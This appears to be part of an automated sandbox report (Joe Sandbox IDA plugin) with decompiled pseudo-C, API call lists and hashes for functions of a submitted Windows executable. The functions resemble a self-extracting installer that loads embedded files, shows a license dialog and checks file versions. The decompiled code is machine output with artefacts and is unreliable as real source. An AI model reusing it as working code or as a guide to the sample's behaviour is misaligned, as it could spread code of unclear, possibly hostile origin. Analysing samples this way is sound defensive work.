                                                                        • Instruction ID: 56ee8582734a51427434878229395876f30f1d4b9a2c25925d0940ec4bd56e22
                                                                        • Opcode Fuzzy Hash: a36337f5254eae1c92dfaac5f6a39872bc11aa7d209859a0626e9b9709781cc4
                                                                        • Instruction Fuzzy Hash: AC41E3366086455FDB179F34BC54AFE7BAD9F66300F15009BE8C287302DBB58E868B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				char _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E003D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t11 =  &_v32; // 0x3d3938
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									_t16 =  &_v32; // 0x3d3938
                                                                        									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E003D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E003D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}

































                                                                        0x003d28f1
                                                                        0x003d28f4
                                                                        0x003d28f7
                                                                        0x003d28f9
                                                                        0x003d28fc
                                                                        0x003d28ff
                                                                        0x003d2901
                                                                        0x003d2907
                                                                        0x003d2a62
                                                                        0x003d2a64
                                                                        0x003d290d
                                                                        0x003d290d
                                                                        0x003d290f
                                                                        0x003d2912
                                                                        0x003d2920
                                                                        0x003d2937
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d293d
                                                                        0x003d2944
                                                                        0x003d294a
                                                                        0x003d294f
                                                                        0x003d2a2f
                                                                        0x003d2a32
                                                                        0x003d2a34
                                                                        0x003d2a37
                                                                        0x003d2a41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2955
                                                                        0x003d295e
                                                                        0x003d2962
                                                                        0x003d2969
                                                                        0x003d296f
                                                                        0x003d2974
                                                                        0x003d297e
                                                                        0x003d298c
                                                                        0x003d2a20
                                                                        0x003d2a21
                                                                        0x003d2a27
                                                                        0x003d2a4c
                                                                        0x003d2a4f
                                                                        0x003d2a50
                                                                        0x003d2a53
                                                                        0x003d2a56
                                                                        0x003d2a5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d29b2
                                                                        0x003d29b2
                                                                        0x003d29b5
                                                                        0x003d29bd
                                                                        0x003d29c3
                                                                        0x003d29cc
                                                                        0x003d29d5
                                                                        0x003d29d7
                                                                        0x003d29da
                                                                        0x003d29dd
                                                                        0x003d29df
                                                                        0x003d29ec
                                                                        0x003d29f8
                                                                        0x003d29fc
                                                                        0x003d29ff
                                                                        0x003d2a02
                                                                        0x003d2a07
                                                                        0x003d2a0a
                                                                        0x003d2a0f
                                                                        0x003d2a19
                                                                        0x003d2a81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2a0f
                                                                        0x003d298c
                                                                        0x003d2974
                                                                        0x003d2962
                                                                        0x00000000
                                                                        0x003d294f
                                                                        0x003d2912
                                                                        0x003d2a65
                                                                        0x003d2a68
                                                                        0x003d2a6c
                                                                        0x003d2a6f
                                                                        0x003d2a6f
                                                                        0x003d2a7d

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 003D2A6F
                                                                          • Part of subcall function 003D2773: CharUpperA.USER32(F4FC83B5,00000000,00000000,00000000), ref: 003D27A8
                                                                          • Part of subcall function 003D2773: CharNextA.USER32(0000054D), ref: 003D27B5
                                                                          • Part of subcall function 003D2773: CharNextA.USER32(00000000), ref: 003D27BC
                                                                          • Part of subcall function 003D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2829
                                                                          • Part of subcall function 003D2773: RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2852
                                                                          • Part of subcall function 003D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2870
                                                                          • Part of subcall function 003D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D28A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,003D3938,?,?,?,?,-00000005), ref: 003D2958
                                                                        • GlobalLock.KERNEL32 ref: 003D2969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,003D3938,?,?,?,?,-00000005,?), ref: 003D2A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,003D3938,?,?), ref: 003D2A81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID: 89=
                                                                        • API String ID: 3949799724-2211818641
                                                                        • Opcode ID: 2bd917c5cb6e65ad4936ca8937769e0fe6f8f95ef59099fd0250f40a833bd1f6
                                                                        • Instruction ID: 8c7adba39ac30f2968dc1a3f8178a4d442ae8b5c04e5cd314d840b8f97c5acd9
                                                                        • Opcode Fuzzy Hash: 2bd917c5cb6e65ad4936ca8937769e0fe6f8f95ef59099fd0250f40a833bd1f6
                                                                        • Instruction Fuzzy Hash: F2512B32D00619DBCB22DF98E884AAEFBB9FF58701F15402BE905E7311DB319A41DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E003D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E003D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}
























                                                                        0x003d43d0
                                                                        0x003d43d8
                                                                        0x003d43df
                                                                        0x003d43e6
                                                                        0x003d43ec
                                                                        0x003d43f1
                                                                        0x003d4400
                                                                        0x003d4403
                                                                        0x003d440b
                                                                        0x003d4420
                                                                        0x003d4429
                                                                        0x003d4437
                                                                        0x003d4444
                                                                        0x003d4447
                                                                        0x003d444d
                                                                        0x003d4454
                                                                        0x003d445b
                                                                        0x003d4460
                                                                        0x003d4461
                                                                        0x003d4467
                                                                        0x003d446f
                                                                        0x003d4473
                                                                        0x003d4473
                                                                        0x003d4463
                                                                        0x003d4463
                                                                        0x003d4463
                                                                        0x003d447a
                                                                        0x003d4481
                                                                        0x003d4484
                                                                        0x003d448a
                                                                        0x003d4492
                                                                        0x003d4496
                                                                        0x003d4496
                                                                        0x003d4486
                                                                        0x003d4486
                                                                        0x003d4486
                                                                        0x003d44b8

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 003D43F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 003D440B
                                                                        • GetDC.USER32(?), ref: 003D4423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 003D442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 003D443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 003D4447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003D44A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 2f319a6d023729c65fed526d4947270317d8a8f0c82fd5f4db1cb71b530cb6db
                                                                        • Instruction ID: 820c477085c1dd515d70b738e17d407658cd4475acd39ae57501f887e5f7ca45
                                                                        • Opcode Fuzzy Hash: 2f319a6d023729c65fed526d4947270317d8a8f0c82fd5f4db1cb71b530cb6db
                                                                        • Instruction Fuzzy Hash: E6316472E01519AFCB15CFB8EE499EEBBB9EB89310F15416AF805F3240D6306C45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E003D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E003D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0x3da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E003D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E003D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}






















                                                                        0x003d6298
                                                                        0x003d62a0
                                                                        0x003d62a7
                                                                        0x003d62ad
                                                                        0x003d62af
                                                                        0x003d62bb
                                                                        0x003d62c3
                                                                        0x003d62c4
                                                                        0x003d633b
                                                                        0x003d633b
                                                                        0x003d6345
                                                                        0x003d634d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d62da
                                                                        0x003d62de
                                                                        0x003d635f
                                                                        0x003d6369
                                                                        0x003d62e0
                                                                        0x003d62e0
                                                                        0x003d62e0
                                                                        0x003d62e3
                                                                        0x003d62e5
                                                                        0x003d62e5
                                                                        0x003d62e8
                                                                        0x003d62e8
                                                                        0x003d62ea
                                                                        0x003d62eb
                                                                        0x003d62ef
                                                                        0x003d62f1
                                                                        0x003d62f3
                                                                        0x003d6302
                                                                        0x003d6308
                                                                        0x003d630d
                                                                        0x003d6314
                                                                        0x003d6314
                                                                        0x003d6316
                                                                        0x003d6319
                                                                        0x003d6355
                                                                        0x003d6357
                                                                        0x003d631b
                                                                        0x003d631b
                                                                        0x003d6331
                                                                        0x003d6334
                                                                        0x003d6339
                                                                        0x00000000
                                                                        0x003d6339
                                                                        0x003d6319
                                                                        0x003d636b
                                                                        0x003d637d
                                                                        0x003d637d
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D62CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D62D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 003D6345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D6357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: 448bfa3907327fe45af31c2fcc451b6c929e1e4bf3ed7b6fb57a9a3a36fc2ce6
                                                                        • Instruction ID: 951989539752b059c7cc9eb473f1fb694c69c74d72d5ece7717929b41c1519ae
                                                                        • Opcode Fuzzy Hash: 448bfa3907327fe45af31c2fcc451b6c929e1e4bf3ed7b6fb57a9a3a36fc2ce6
                                                                        • Instruction Fuzzy Hash: 6721F676A00219ABDB129FA4EC469FE7B7CEB48710F01011BF912A3351DB359D068BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E003D468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0x3d8d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E003D468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0x3d8d4c, "<None>") == 0) {
                                                                        							LocalFree( *0x3d8d4c);
                                                                        							L9:
                                                                        							 *0x3d9124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E003D6517(_t19, 0x7d1, 0, E003D3100, 0, 0);
                                                                        						LocalFree( *0x3d8d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0x3d9124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0x3d8d4c);
                                                                        					 *0x3d9124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0x3d9124 = E003D6285();
                                                                        				goto L2;
                                                                        			}






                                                                        0x003d3a46
                                                                        0x003d3a57
                                                                        0x003d3a5d
                                                                        0x003d3a63
                                                                        0x003d3a6a
                                                                        0x003d3a91
                                                                        0x003d3a9a
                                                                        0x003d3ad8
                                                                        0x003d3b13
                                                                        0x003d3b19
                                                                        0x003d3b1b
                                                                        0x00000000
                                                                        0x003d3b21
                                                                        0x003d3ae7
                                                                        0x003d3af4
                                                                        0x003d3afc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3afe
                                                                        0x003d3a87
                                                                        0x00000000
                                                                        0x003d3a87
                                                                        0x003d3aa8
                                                                        0x003d3ab3
                                                                        0x003d3ab9
                                                                        0x00000000
                                                                        0x003d3ab9
                                                                        0x003d3a78
                                                                        0x003d3a82
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F64,?,00000002,00000000), ref: 003D3A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 003D3AB3
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 003D3AD0
                                                                        • LocalFree.KERNEL32 ref: 003D3B13
                                                                          • Part of subcall function 003D6517: FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                          • Part of subcall function 003D6517: LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                          • Part of subcall function 003D6517: DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                          • Part of subcall function 003D6517: FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        • LocalFree.KERNEL32(00000000,003D3100,00000000,00000000), ref: 003D3AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: b70d9d0c28ee3bde736f12d90ed2b6160f9bf4cb6894a86dc4f57b16a5027367
                                                                        • Instruction ID: b259d7ca63189fa236bb0c6bd0611e10d5d53cc545dc45477f115ec33324261e
                                                                        • Opcode Fuzzy Hash: b70d9d0c28ee3bde736f12d90ed2b6160f9bf4cb6894a86dc4f57b16a5027367
                                                                        • Instruction Fuzzy Hash: F611A232302201BBD723AB36BD0AE177BBEEBD5700F10442FB542DA7E0DA798D008661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D24E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E003D658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}











                                                                        0x003d24e0
                                                                        0x003d24eb
                                                                        0x003d24f2
                                                                        0x003d24f7
                                                                        0x003d2504
                                                                        0x003d250e
                                                                        0x003d251d
                                                                        0x003d252c
                                                                        0x003d2541
                                                                        0x003d2546
                                                                        0x003d2553
                                                                        0x003d2555
                                                                        0x003d2555
                                                                        0x003d2546
                                                                        0x003d256c

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 003D2506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 003D252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 003D253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 003D254C
                                                                        • _lclose.KERNEL32(00000000), ref: 003D2555
                                                                        Strings
                                                                        Memory Dump Source
